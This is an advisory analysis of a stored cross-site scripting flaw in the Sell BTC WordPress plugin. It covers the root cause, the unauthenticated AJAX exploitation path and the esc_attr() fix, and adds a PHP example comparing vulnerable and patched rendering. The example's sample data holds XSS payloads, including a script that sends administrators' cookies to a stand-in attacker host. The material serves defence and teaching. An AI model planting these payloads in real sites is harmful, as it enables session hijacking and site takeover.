Atomic Edge analysis of CVE-2025-14554:
The Sell BTC – Cryptocurrency Selling Calculator WordPress plugin contains an unauthenticated stored cross-site scripting vulnerability in versions up to and including 1.5. The vulnerability exists in the order data display functionality within the admin dashboard, allowing attackers to inject malicious scripts that execute when administrators view the Orders page. This vulnerability received a CVSS score of 7.2 (High severity).
The root cause is insufficient output escaping when rendering user-supplied order data in the plugin’s admin interface. The vulnerable code in sell-btc-by-hayyatapps/Pages/orders.php lines 27-35 and 46-53 directly concatenates user-controlled data from the $data array into HTML output without proper escaping. The affected fields include happs-FirstName, happs-LastName, happs-Email, happs-Phone, and several other order data fields. This lack of escaping allows JavaScript payloads to persist in the database and execute in the browser context of administrators viewing the orders.
Exploitation occurs via the ‘orderform_data’ AJAX action, reachable without authentication at /wp-admin/admin-ajax.php. An attacker sends a POST request with action=orderform_data and a JavaScript payload in any of the user-controlled order fields (for example happs-FirstName or happs-Email). The plugin stores these values as submitted, with no sanitization on input and no escaping on output. When an administrator later opens the Orders page in the WordPress admin dashboard (wp-admin/admin.php?page=sell-btc-orders), the stored payload is rendered into the page and executes in the administrator’s browser session, potentially leading to session hijacking or administrative account compromise.
The patch in version 1.6 adds WordPress esc_attr() function calls to all user-controlled data outputs in the orders.php file. Each concatenated data field now passes through esc_attr() before being inserted into HTML table cells and paragraph elements. This ensures that any HTML special characters, including angle brackets and quotes, are properly encoded as HTML entities, preventing script execution while preserving the data’s display value. The version number in sell-btc.php also increments from 1.5 to 1.6.
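The following PHP is an added illustration of the vulnerable rendering pattern from the root-cause paragraph next to the esc_attr()-hardened form introduced in 1.6. It is not code from the plugin or from this advisory: the $data keys are the field names the advisory lists, but the row-rendering functions, the sample order record and the check function are assumptions written for this example, and the local esc_attr() is a stand-in so the script runs without WordPress loaded.

```php
<?php
// Added example for CVE-2025-14554. Not the plugin's own code: the two
// render functions reconstruct the pattern the advisory describes
// (string concatenation of $data fields into <td> cells), they are not
// copied from sell-btc-by-hayyatapps/Pages/orders.php.

// Constructed attacker-controlled order record, as it would sit in the
// database after an unauthenticated POST with action=orderform_data.
$data = [
    'happs-FirstName' => '<script>document.location="https://attacker.invalid/?c=" + document.cookie</script>',
    'happs-LastName'  => 'Doe',
    'happs-Email'     => '<img src=x onerror="alert(document.domain)">',
    'happs-Phone'     => '+1-555-0100',
];

// Stand-in for WordPress esc_attr() so the script runs from the CLI.
// Real esc_attr() also passes the result through the 'attribute_escape'
// filter, but the encoding of & < > " ' is the same.
if (!function_exists('esc_attr')) {
    function esc_attr($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern (1.5): raw concatenation, so stored markup reaches
// the administrator's DOM unchanged.
function render_row_vulnerable(array $data): string {
    return '<tr>'
        . '<td>' . $data['happs-FirstName'] . '</td>'
        . '<td>' . $data['happs-LastName']  . '</td>'
        . '<td>' . $data['happs-Email']     . '</td>'
        . '<td>' . $data['happs-Phone']     . '</td>'
        . '</tr>';
}

// Patched pattern (1.6): every user-controlled field goes through
// esc_attr() before it is concatenated into the cell.
function render_row_patched(array $data): string {
    return '<tr>'
        . '<td>' . esc_attr($data['happs-FirstName']) . '</td>'
        . '<td>' . esc_attr($data['happs-LastName'])  . '</td>'
        . '<td>' . esc_attr($data['happs-Email'])     . '</td>'
        . '<td>' . esc_attr($data['happs-Phone'])     . '</td>'
        . '</tr>';
}

// Crude check on the rendered HTML: does a literal <script tag or a tag
// carrying an on* event handler survive into the output?
function contains_live_markup(string $html): bool {
    return stripos($html, '<script') !== false
        || preg_match('/<\w+[^>]*\son\w+\s*=/i', $html) === 1;
}

echo "vulnerable: " . render_row_vulnerable($data) . PHP_EOL;
echo "patched:    " . render_row_patched($data) . PHP_EOL;
echo "live markup in vulnerable output: "
    . var_export(contains_live_markup(render_row_vulnerable($data)), true) . PHP_EOL;
echo "live markup in patched output:    "
    . var_export(contains_live_markup(render_row_patched($data)), true) . PHP_EOL;
```

Run it with `php orders_xss_example.php`. In the patched output the angle brackets and quotes of both payloads appear as entities, so the browser shows them as text instead of parsing them. Note that the values here land in element text content rather than in attribute values; WordPress convention is esc_html() for text nodes and esc_attr() for attribute values, but both encode the same five characters, so esc_attr() as used in the 1.6 patch neutralizes the payload either way.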
Successful exploitation allows unauthenticated attackers to execute arbitrary JavaScript in the context of WordPress administrators. This can lead to complete site compromise through session hijacking, administrative credential theft, backdoor installation via plugin/theme editing, or content manipulation. Attackers could also redirect administrators to phishing pages or perform actions on their behalf, potentially resulting in full control over the WordPress installation and associated data.
